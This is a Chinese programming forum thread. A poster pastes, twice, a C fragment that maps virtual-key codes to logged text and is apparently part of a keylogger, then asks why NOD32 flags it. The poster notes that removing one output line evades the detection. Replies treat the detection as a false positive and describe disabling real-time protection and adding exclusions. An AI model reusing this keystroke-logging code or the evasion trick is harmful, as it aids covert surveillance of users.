9,506
社区成员
发帖
与我相关
我的任务
分享杀毒软件误报的问题
自己做了一个日志发送的程序,今天发现被NOD32给杀了,定位到的特征是在下面的区间
switch(character)
{
case VK_SPACE:
myfputc(' ',file);
fclose(file);
break;
case VK_SHIFT:
myfputs("[SHIFT]",file);
fclose(file);
break;
case VK_RETURN:
myfputs("\n[ENTER]",file);
fclose(file);
break;
case VK_BACK:
myfputs("[BACKSPACE]",file);
fclose(file);
break;
case VK_TAB:
myfputs("[TAB]",file);
fclose(file);
break;
case VK_CONTROL:
myfputs("[CTRL]",file);
fclose(file);
break;
case VK_DELETE:
myfputs("[DEL]",file);
fclose(file);
break;
case VK_OEM_1:
myfputs("[;:]",file);
fclose(file);
break;
case VK_OEM_2:
myfputs("[/?]",file);
fclose(file);
break;
case VK_OEM_3:
myfputs("[`~]",file);
fclose(file);
break;
case VK_OEM_4:
myfputs("[ [{ ]",file);
fclose(file);
break;
case VK_OEM_5:
myfputs("[\\|]",file);
fclose(file);
break;
case VK_OEM_6:
myfputs("[ ]} ]",file);
fclose(file);
break;
case VK_OEM_7:
myfputs("['\"]",file);
fclose(file);
break;
case VK_OEM_PLUS:
myfputc('+',file);
fclose(file);
break;
case VK_OEM_COMMA:
myfputc(',',file);
fclose(file);
break;
case VK_OEM_MINUS:
myfputc('-',file);
fclose(file);
break;
case VK_OEM_PERIOD:
myfputc('.',file);
fclose(file);
break;
case VK_NUMPAD0:
myfputc('0',file);
fclose(file);
break;
case VK_NUMPAD1:
myfputc('1',file);
fclose(file);
break;
case VK_NUMPAD2:
myfputc('2',file);
fclose(file);
break;
case VK_NUMPAD3:
myfputc('3',file);
fclose(file);
break;
case VK_NUMPAD4:
myfputc('4',file);
fclose(file);
break;
case VK_NUMPAD5:
myfputc('5',file);
fclose(file);
break;
case VK_NUMPAD6:
myfputc('6',file);
fclose(file);
break;
case VK_NUMPAD7:
myfputc('7',file);
fclose(file);
break;
case VK_NUMPAD8:
myfputc('8',file);
fclose(file);
break;
case VK_NUMPAD9:
myfputc('9',file);
fclose(file);
break;
case VK_CAPITAL:
myfputs("[CAPS LOCK]",file);
fclose(file);
break;
case 110:
myfputc('.',file);
fclose(file);
break;
case VK_MENU:
myfputs("[ALT]",file);
fclose(file);
break;
default:
fclose(file);
break;
}
}
}
}
}
}
return EXIT_SUCCESS;
}
////////////////////////////////////////////////////////////////////////////////////
只要注释掉任意的myfputs 然后编译就会不杀了 比如注释掉myfputs("[SHIFT]",file); 然后
编译,结果就不杀了,我想问的是这是不是我定位错误了? 还是杀的本来就是这个位置?新手求
问
switch(character)
{
case VK_SPACE:
myfputc(' ',file);
fclose(file);
break;
case VK_SHIFT:
myfputs("[SHIFT]",file);
fclose(file);
break;
case VK_RETURN:
myfputs("\n[ENTER]",file);
fclose(file);
break;
case VK_BACK:
myfputs("[BACKSPACE]",file);
fclose(file);
break;
case VK_TAB:
myfputs("[TAB]",file);
fclose(file);
break;
case VK_CONTROL:
myfputs("[CTRL]",file);
fclose(file);
break;
case VK_DELETE:
myfputs("[DEL]",file);
fclose(file);
break;
case VK_OEM_1:
myfputs("[;:]",file);
fclose(file);
break;
case VK_OEM_2:
myfputs("[/?]",file);
fclose(file);
break;
case VK_OEM_3:
myfputs("[`~]",file);
fclose(file);
break;
case VK_OEM_4:
myfputs("[ [{ ]",file);
fclose(file);
break;
case VK_OEM_5:
myfputs("[\\|]",file);
fclose(file);
break;
case VK_OEM_6:
myfputs("[ ]} ]",file);
fclose(file);
break;
case VK_OEM_7:
myfputs("['\"]",file);
fclose(file);
break;
case VK_OEM_PLUS:
myfputc('+',file);
fclose(file);
break;
case VK_OEM_COMMA:
myfputc(',',file);
fclose(file);
break;
case VK_OEM_MINUS:
myfputc('-',file);
fclose(file);
break;
case VK_OEM_PERIOD:
myfputc('.',file);
fclose(file);
break;
case VK_NUMPAD0:
myfputc('0',file);
fclose(file);
break;
case VK_NUMPAD1:
myfputc('1',file);
fclose(file);
break;
case VK_NUMPAD2:
myfputc('2',file);
fclose(file);
break;
case VK_NUMPAD3:
myfputc('3',file);
fclose(file);
break;
case VK_NUMPAD4:
myfputc('4',file);
fclose(file);
break;
case VK_NUMPAD5:
myfputc('5',file);
fclose(file);
break;
case VK_NUMPAD6:
myfputc('6',file);
fclose(file);
break;
case VK_NUMPAD7:
myfputc('7',file);
fclose(file);
break;
case VK_NUMPAD8:
myfputc('8',file);
fclose(file);
break;
case VK_NUMPAD9:
myfputc('9',file);
fclose(file);
break;
case VK_CAPITAL:
myfputs("[CAPS LOCK]",file);
fclose(file);
break;
case 110:
myfputc('.',file);
fclose(file);
break;
case VK_MENU:
myfputs("[ALT]",file);
fclose(file);
break;
default:
fclose(file);
break;
}
}
}
}
}
}
return EXIT_SUCCESS;
}
////////////////////////////////////////////////////////////////////////////////////
只要注释掉任意的myfputs 然后编译就会不杀了 比如注释掉myfputs("[SHIFT]",file); 然后
编译,结果就不杀了,我想问的是这是不是我定位错误了? 还是杀的本来就是这个位置?新手求
问
...全文
请发表友善的回复…
发表回复
Rocloud 2014-07-09
- 打赏
- 举报
轉載的——软件被NOD32误杀的解决方案
我方技术人员今天发现,在NOD32更新到20110601病毒库后,对我公司的软件存在误报木马现象,会导致系统无法正常使用。我方正联系ESET方面进行处理。
对于有这种问题的客户,可按下面的解决方案进行处理:
在NOD32中禁用文件系统实时防护
然后打开NOD32的隔离窗口,将被误报的文件恢复,如下图1所示:
点击浏览下一页
图1
在NOD32主界面汇总,点“设置”,然后点“显示所有高级设置…”(图2),然后在“排除”窗口中添加被误报的文件,如图3所示。
点击浏览下一页
图2
点击浏览下一页
图3
设置好后在NOD32中重新开启文件系统实时防护
上述解决方案可处理NOD32误报现象。如有问题,可直接与我们联系。
Rocloud 2014-07-09
- 打赏
- 举报
一,卡巴就好像西毒,凶猛强悍,神功盖世,对敌决不留情,出手狠辣,招招夺命,绝少失手,不愧为一代枭雄,但毕竟练的不是纯正内功,容易走火入魔,导致{系统}出问题.
二,麦咖啡就像东邪,玉树临风,俊朗潇洒,对敌招式繁多,机关重重,杀伐决断从不迟疑,为江湖第一机智聪明之人,但因其心机太深,令人难以掌握.
三,诺顿就像南帝,雍容华贵,稳沉厚重,胸怀博大,练的是纯正内功,靠的是教化感人,对敌有慈悲心肠,一般采取隔离教化,使其不在作恶,很少杀人,称的上是一代宗师,但因其过于敦厚,不仅自己活的累,别人也为他感到累.
四,nod32就像北丐,来无影去无踪,潇潇洒洒,笑傲江湖,对敌用的是逍遥游和打狗棍法,江湖上少有对手,但因其过于轻浮,难免误事.
nod32應該沒有那麼不堪吧
IceNature 2014-07-09
- 打赏
- 举报
启发加上你的程序又不在人家的白名单里,误报是很正常的
你可以ESET->工具->提交文件以供分析 中提交误报
当然在入库之前先排除吧
赵4老师 2014-07-08
- 打赏
- 举报
对杀毒软件要这样使用:
安装,杀毒、卸载。
caewow 2014-07-06
- 打赏
- 举报
误报,果断卸掉
流浪的猴子mokey 2014-07-05
- 打赏
- 举报
换个国内的杀毒软件试试吧。。。
Henzox 2014-07-03
- 打赏
- 举报
卸掉它吧,赶紧换一个杀软。
hiolgh 2014-05-10
- 打赏
- 举报
是啊,像NOD32这样的杀毒软件,误杀误报还是比较严重的。
